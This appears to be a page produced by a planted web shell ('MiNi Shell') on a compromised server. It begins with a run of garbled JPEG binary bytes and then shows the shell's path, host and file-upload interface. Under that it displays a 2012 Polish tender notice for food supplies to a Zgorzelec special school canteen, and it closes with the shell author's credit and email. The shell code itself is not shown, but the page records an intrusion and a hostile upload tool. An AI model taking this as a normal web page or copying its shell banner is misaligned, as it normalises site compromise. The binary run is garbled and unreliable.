JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120806/286872-N-2012.html

<p class="kh_header"><b>Zgorzelec: Dostawa produktów żywnościowych do stołówki szkolnej.</b><br>
<b>Numer ogłoszenia: 286872 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy im. Marii Grzegorzewskiej , ul. Armii Krajowej 10-10A, 59-900 Zgorzelec, woj. dolnośląskie, tel. 75 7752471, 7752473, faks 75 7752471.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Jednostki Samorządu Terytorialnego - Szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych do stołówki szkolnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów żywnościowych do stołówki szkolnej w Specjalnym Ośrodku Szkolno-Wychowawczym im. Marii Grzegorzewskiej w Zgorzelcu z siedzibą przy ul. Armii Krajowej 10-10a. Zamówienie podzielone jest na 8 części. 
Część nr 1 Produkty spożywcze różne -  Barszcz biały typu Winiary lub produkt równoważny opakowanie 66g -120 szt, Żurek typu Winiary lub produkt równoważny opakowanie 51g - 60 szt, Barszcz czerwony instant Winiary lub produkt równoważny opakowanie 60g - 125 szt, Zupa grzybowa Winiary lub produkt równoważny opakowanie 48g - 40szt, Sos pieczeniowy ciemny Winiary lub produkt równoważny opakowanie30g - 125szt, Sos boloński typu Winiary lub produkt równoważny, opakowanie 46g - 55szt, Budyń Winiary z cukrem lub równoważny, opakowanie 60g - 160szt, Majonez Winiary lub równoważny, opakowanie 700ml - 40szt, Rosół drobiowy Winiary lub równoważny opakowanie 180g- 90 op, 
Przyprawa Delikat do mięs typu Knorr lub produkt równoważny, opakowanie 75g - 145szt, Przyprawa uniwersalna typu Kucharek lub produkt równoważny, opakowanie 1kg - 54kg, cukier opakowanie 1kg - 590kg, cukier waniliowy opakowanie 32 g - 100szt, cynamon opakowanie 20g - 10szt, czosnek granulowany - 20szt, gałka muszkatołowa w kulkach po 2 szt - 10szt, kminek opakowanie 20g - 10szt, kwasek cytrynowy opakowanie 30g - 85szt, liść laurowy suszony opakowanie 8g - 58szt, majeranek suszony opakowanie 20g - 40szt, zioła prowansalskie suszone opakowanie 10g - 11szt, papryka mielona opakowanie 20g - 65szt, pieprz prawdziwy opakowanie 20g - 290szt, ziele angielskie opakowanie 15g - 85szt, proszek do pieczenia opakowanie 36g - 20szt, herbata granulowana opakowanie 80g - 50szt, herbata indyjska liściasta opakowanie 100g - 40szt, soda oczyszczona opakowanie 50g - 20szt, sól opakowanie 1kg - 190kg, ryż w torebkach opakowanie 4x100g - 200op, przyprawa w płynie do zup i sosów Winiary lub produkt równoważny opakowanie 960ml - 35 szt, przyprawa do kurczaka Kamis lub produkt równoważny - 22szt, pieprz ziołowy opakowanie 20g - 120szt, przyprawa do ryb opakowanie 20g - 28szt,  przyprawa do flaków opakowanie 20g - 10szt, płatki kukurydziane śniadaniowe opakowanie 250g - 84op, ogórki konserwowe opakowanie 870g - 58 szt, ogórki kiszone pakowane po 3kg - 161kg, musztarda stołowa opakowanie 200g - 95szt, mąka ziemniaczana opakowanie 0,5kg- 46szt, mąka tortowa typ 450 - 160kg, mąka luksusowa typ 550 - 160kg, makaron spaghetti opakowanie 400g - 147op, makaron świderki opakowanie 1kg - 109kg, kukurydza konserwowa opakowanie 400g - 85szt, groszek konserwowy opakowanie 400g - 160szt, koncentrat pomidorowy Pudliszki lub produkt równoważny 30% opakowanie 200g - 372szt, kisiel z cukrem opakowanie 38g - 215szt, Keczup Pudliszki lub produkt równoważny równoważny, opakowanie 700g - 115szt,  kawa zbożowa Inka lub produkt równoważny, opakowanie 150g - 34op, kasza manna błyskawiczna opakowanie 0,5kg - 40szt, kasza jęczmienna średnia opakowanie 1kg - 60kg, kapusta kiszona pakowana po 5kg - 515kg, kakao ciemne opakowanie 200g - 30op, fasola konserwowa czerwona opakowanie 400g - 25szt, fasola Jaś średnia opakowanie 5kg - 12op, dżem owocowy opakowanie 280g - 222szt, czekolada mleczna opakowanie 100g - 80szt, wafelek Grześki lub produkt równoważny opakowanie 39g - 700szt, herbatniki typu Pettitki opakowanie 50g - 223 op, paluszki opakowanie 100g - 85op, biszkopty okrągłe opakowanie 138g - 60op, chrupki kukurydziane opakowanie 70g - 50op, płatki owsiane typu górskie opakowanie 500g - 20op, makaron krajanka opakowanie 250g - 130op, herbata w torebkach typu Saga pakowana po 100szt - 20op. Część nr 2 - Mięso wieprzowe, wołowe i przetwory mięsne, mięso drobiowe-flaki wołowe - 40kg, karczek bez kości - 46kg, łopatka bez kości - 508kg, porcje rosołowe ze skrzydłami - 260kg, kurczaki - 290kg, piersi drobiowe - 92kg, płuca wieprzowe - 20kg, schab bez kości - 105kg, serca wieprzowe - 10kg, słonina - 22kg, udka z kurczaka -15kg, szynka bez kości - 22kg, wątróbka drobiowa - 37kg, wołowina bez kości - 12kg, żołądki drobiowe - 20kg, polędwica drobiowa - 15kg, kiełbasa typu Krakowska - 56kg, kiełbasa typu Szynkowa - 10kg, kiełbasa cienka zwyczajna - 100kg, kiełbasa typu Żywiecka - 75kg, parówki drobiowe - 70kg, pasztet pieczony w bloku - 24kg,  pasztet drobiowy Podlaski lub równoważny opakowanie 160g - 250szt, pieczeń wieprzowa typu Rzymska - 68kg, szynka typu Tyrolska - 30kg, kiełbasa typu Śląska - 60kg. Część nr 3 Ryby mrożone - morszczuk SHP bez glazury - 40kg, mintaj SHP bez glazury - 40kg, miruna SHP bez glazury - 40kg, panga SHP bez glazury - 40kg, matjias śledź - 15kg, makrela wędzona - 25kg. Część nr 4 Pieczywo i wyroby cukiernicze - chleb mieszany świeży, krojony i foliowany 600g - 2795szt, bułka zwykła 80g - 350szt, bułka słodka z serem, makiem, marmoladą 100g - 200szt, pączek z nadzieniem 60g - 50szt, drożdże 100g - 50szt, bułka tarta opakowanie 1kg - 257kg. Część nr 5 Nabiał - mleko 2%, foliowane opakowanie 1l - 1517l, śmietana 18% opakowanie 0,40l - 148szt, śmietana 30% opakowanie 0,25l - 1141szt, masło w kostce 200g - 966szt, ser żółty Gouda foliowany w blok - 50kg, ser żółty Salami foliowany w blok - 40kg, twaróg półtłusty w pergaminie  - 200kg, margaryna typu mleczna do smażenia i pieczenia - 107szt, jogurt owocowy kubek 150g  - 430szt, jogurt naturalny opakowanie 370g - 30szt, twaróg śmietankowy typu Pacynka w folii 250g - 100szt, olej do smażenia uniwersalny opakowanie butelkowe 1l - 345l, ser topiony 40% pakowany w kostki po 100g  - 35kg, ser mozzarella opakowanie 250g  - 50szt, ser typu Kirii o smaku śmietankowym opakowanie 100g  - 50szt. Część nr 6 Mrożonki - mieszanka kompotowa z pestką - 490kg, fasola szparagowa żółta mrożona  - 50kg, kalafior mrożony  - 50kg, papryka czerwona w kostce, mrożona - 30kg, zupa mrożona z grzybami leśnymi - 40kg, zupa mrożona paprykarz-leczo - 20kg. Część nr 7 Owoce, warzywa - marchew workowana - 460kg, cebula workowana  - 400kg, czosnek - 70główek, brokuły  - 20szt, cukinia - 45kg, kapusta biała - 155kg, papryka - 40kg, pomidory - 85kg, pietruszka workowana - 92kg, pietruszka nać - 150pęczków, seler korzeń  - 105kg, por - 40kg, burak czerwony - 225kg, kapusta włoska - 20główek, kapusta pekińska  - 130kg, szczaw świeży - 20pęczków, koper świeży - 115pęczków, ogórek zielony - 77kg, rzodkiewka - 40pęczków, sałata - 160główek, ziemniaki - 4500kg, szczypior - 290pęczków, pieczarki - 100kg, jabłka - 470kg, śliwki - 30kg, truskawki - 40kg, kiwi - 150szt, mandarynka - 40kg, owoc pomarańczy - 20kg, kapusta biała młoda - 125szt, banan - 20kg, botwinka - 20pęczków, cytryna - 10kg. Część nr 8 - jaja świeże, klasa M - 3825szt;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.10.00.00-9, 15.11.00.00-2, 15.11.10.00-9, 15.13.11.30-5, 15.11.30.00-3, 15.11.20.00-6, 15.22.10.00-3, 15.22.00.00-6, 15.24.18.00-7, 15.81.00.00-9, 15.50.00.00-3, 15.89.60.00-5, 15.30.00.00-1, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania warunku Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych. Sposób dokonywania oceny spełniania warunku będzie oparty na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania warunku Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych. Sposób dokonywania oceny spełniania warunku będzie oparty na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania warunku Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych. Sposób dokonywania oceny spełniania warunku będzie oparty na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych. Sposób dokonywania oceny spełniania warunku będzie oparty na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania warunku Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych. Sposób dokonywania oceny spełniania warunku będzie oparty na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany postanowień umowy w przypadku zaistnienia okoliczności których nie  można było przewidzieć w chwili zawarcia umowy, a w szczególności w przypadku zmian cen urzędowych, zmian stawek podatkowych lub stawek celnych oraz w przypadku wystąpienia nieprzewidzianych zdarzeń losowych. Zmiany te mogą nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.zgorzelec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno-Wychowawczy im. Marii Grzegorzewskiej
ul. Armii Krajowej 10-10a, 59-900 Zgorzelec, Sekretariat szkoły.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 12:00, miejsce: Specjalny Ośrodek Szkolno-Wychowawczy im. Marii Grzegorzewskiej
ul. Armii Krajowej 10-10a, 59-900 Zgorzelec, Sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com